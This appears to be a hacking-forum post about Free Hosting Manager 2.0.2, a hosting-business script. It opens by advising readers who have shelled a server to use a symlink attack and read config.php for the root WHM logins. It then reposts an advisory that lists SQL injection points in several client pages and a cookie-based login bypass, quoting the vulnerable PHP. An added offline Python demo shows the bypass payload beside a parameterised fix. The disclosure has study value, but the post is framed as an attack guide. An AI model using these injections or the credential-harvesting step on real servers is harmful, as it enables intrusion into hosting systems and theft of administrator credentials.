Hi, for today: Free Hosting Manager. Free Hosting Manager is a free script for installing and running a hosting business.
It includes client registration, hosting orders and so on, and the script is highly vulnerable. On top of that, if you manage to upload a shell or otherwise get server access, a symlink attack gets you the root WHM logins:
Free Hosting Manager stores its root logins in config.php.
So if you shell a box running it, check config.php for the root logins.
Exploit Links
http://www.exploit-db.com/exploits/24879
http://packetstormsecurity.com/files/120920/Free-Hosting-Manager-2.0.2-SQL-Injection.html
http://1337day.com/exploit/20555
Exploit Details
-------------------------------------------------------------------------
# Software : Free Hosting Manager V2.0.2 Multiple SQLi
# Author : Saadat Ullah , saadi_linux@rocketmail.com
# Author home : http://security-geeks.blogspot.com
# Date : 23/3/13
# Vendors : http://www.fhm-script.com
# Download Link : http://www.fhm-script.com/download.php
-------------------------------------------------------------------------
+---+[ Multiple SQL injection]+---+
It is vulnerable to SQLi in many files; some of them are:
http://localhost/Free/clients/reset.php?code=[SQLi]
http://localhost/Free/clients/tickets.php?id=[SQLi]
http://localhost/free/clients/viewaccount.php?id=[SQLi]
Cookie-based injection in
http://localhost/free/clients/home.php
inject the cookie value clientuser (clientpass and clientid go into the same query, see below)
http://localhost/free/clients/register.php ---> SQLi on all POST fields.
Proof Of Concept
In home.php
home.php calls a function auth(); this is what it does with the three client cookies (note that, as excerpted, the return true; comes before the query):
if ((isset($_COOKIE['clientuser'])) && isset($_COOKIE['clientpass']) && isset($_COOKIE['clientid'])) {
    // all three values are taken straight from the client's cookies, unescaped
    $clientuser = $_COOKIE['clientuser'];
    $clientpass = $_COOKIE['clientpass'];
    $clientid = $_COOKIE['clientid'];
    $this->clientuser = $_COOKIE['clientuser'];
    $this->clientpass = $_COOKIE['clientpass'];
    $this->clientid = $_COOKIE['clientid'];
    return true;
// the cookie values are interpolated directly into the SQL string
$dbquery = @mysql_query("SELECT * FROM clients WHERE id='$clientid' AND username='$clientuser' AND password='$clientpass'") or die(mysql_error());
In reset.php
http://localhost/Free/clients/reset.php?code=[SQLi]
elseif ((isset($code)) || ($_GET['do'] == "code")) {
    // $code is the code parameter from the URL, used unescaped in the query
    $details = mysql_query("SELECT * FROM clientpwactivation WHERE activationcode='$code'")
        or die(mysql_error());
In tickets.php
http://localhost/Free/clients/tickets.php?id=[SQLi]
if ((isset($_GET['id'])) && ($_GET['action'] == "close") && ($_GET['confirm'] == "true")) {
    // the raw id parameter is handed to closeticket() ...
    $fhm->closeticket($_GET['id']);
...
// ... which builds the query from it without escaping
$checkticket = mysql_query("SELECT * FROM tickets WHERE id='$ticket' AND clientid='$this->clientid'") or die(mysql_error());
In viewaccount.php
http://localhost/free/clients/viewaccount.php?id=[SQLi]
$id = $_GET['id'];   // unescaped
...
$getacct = mysql_query("SELECT * FROM orders WHERE id='$id' AND clientid='$fhm->clientid'") or die(mysql_error());
In register.php
$firstname = stripslashes($_POST['first_name']);
$lastname = stripslashes($_POST['last_name']);
$company = stripslashes($_POST['company']);
$address = stripslashes($_POST['address']);
$address2 = stripslashes($_POST['address_2']);
$country = stripslashes($_POST['country']);
$city = stripslashes($_POST['city']);
$state = stripslashes($_POST['state_region']);
$postcode = stripslashes($_POST['postal_code']);
$telnumber = stripslashes($_POST['tel_number']);
$faxnumber = stripslashes($_POST['fax_number']);
$emailaddress = stripslashes($_POST['email_address']);
$username = stripslashes($_POST['username']);
$password1 = stripslashes($_POST['password']);
$password2 = stripslashes($_POST['confirm_password']);
...
$insertuser = mysql_query("INSERT INTO clients VALUES('', '$username', '$md5pass', '$firstname', '$lastname', '$company', '$address', '$address2', '$city', '$country', '$state', '$postcode', '$telnumber', '$faxnumber', '$emailaddress', '$startingcredits', '1', '', '', '$timestamp') ")
Only stripslashes() is applied to the POST fields, and that does not protect against SQL injection: stripslashes() removes backslashes, it does not escape quotes, so the values are interpolated into the INSERT exactly as the attacker sent them. Worse, on a PHP build with magic_quotes_gpc enabled, the backslashes that magic quotes put in front of quote characters are stripped back off, so the one thing that might have escaped the input is undone before the query is built.
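To make the point concrete, here is an added example (my own code, not from the advisory or from the Free Hosting Manager source) that emulates the auth() query from home.php and the stripslashes() handling from register.php against an in-memory SQLite database. The clients table, the row for "alice" and the attacker cookies are constructed for the demo; the stripslashes() emulation and the MD5 password hash are assumptions that mirror the PHP code quoted above. It shows that the cookie payload logs in as alice whether or not magic-quotes-style backslashes were added, and that the same payload fails against a parameterised query.

```python
"""
Added demonstration: cookie-based SQL injection in an auth() query built
by string interpolation (as in FHM home.php), beside the parameterised
fix. Everything here runs offline against SQLite; the table contents
and attacker inputs are constructed for the example.
"""
import hashlib
import re
import sqlite3

# Constructed credential for the demo user (FHM stores md5 hashes).
ALICE_PASSWORD_MD5 = hashlib.md5(b"correct horse").hexdigest()


def stripslashes(s: str) -> str:
    """Emulates PHP stripslashes(): drop a backslash, keep the next char.
    \\' -> '  and  \\\\ -> \\ . It never escapes anything."""
    return re.sub(r"\\(.)", r"\1", s)


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the FHM clients table (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE clients (id TEXT, username TEXT, password TEXT)")
    conn.execute("INSERT INTO clients VALUES (?, ?, ?)",
                 ("1", "alice", ALICE_PASSWORD_MD5))
    conn.commit()
    return conn


def auth_vulnerable(conn, clientid, clientuser, clientpass):
    """Same pattern as home.php auth(): the three cookie values are run
    through stripslashes() (as register.php does) and interpolated into
    the SQL string. Returns the matched row, or None."""
    q = ("SELECT * FROM clients WHERE id='%s' AND username='%s' AND password='%s'"
         % (stripslashes(clientid), stripslashes(clientuser), stripslashes(clientpass)))
    return conn.execute(q).fetchone()


def auth_fixed(conn, clientid, clientuser, clientpass):
    """The fix: bind the values as parameters; quotes in the input are
    data, never SQL syntax."""
    q = "SELECT * FROM clients WHERE id=? AND username=? AND password=?"
    return conn.execute(q, (clientid, clientuser, clientpass)).fetchone()


if __name__ == "__main__":
    db = make_db()
    # Attacker sets clientuser so the password check is commented out.
    payload = "alice' -- "
    print("vulnerable, plain payload :", auth_vulnerable(db, "1", payload, "wrong"))
    # With magic_quotes_gpc the quote would arrive as \' ; stripslashes undoes it.
    print("vulnerable, magic-quoted  :", auth_vulnerable(db, "1", "alice\\' -- ", "wrong"))
    print("fixed, same payload       :", auth_fixed(db, "1", payload, "wrong"))
    print("fixed, real credentials   :", auth_fixed(db, "1", "alice", ALICE_PASSWORD_MD5))
```

The `--` comment trick used here works in both MySQL and SQLite, so the behaviour matches what the interpolated mysql_query() calls above would do; the magic-quoted case is the one that matters for FHM, because stripslashes() strips exactly the escaping that magic_quotes_gpc would have added.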
#independent Pakistani Security Researcher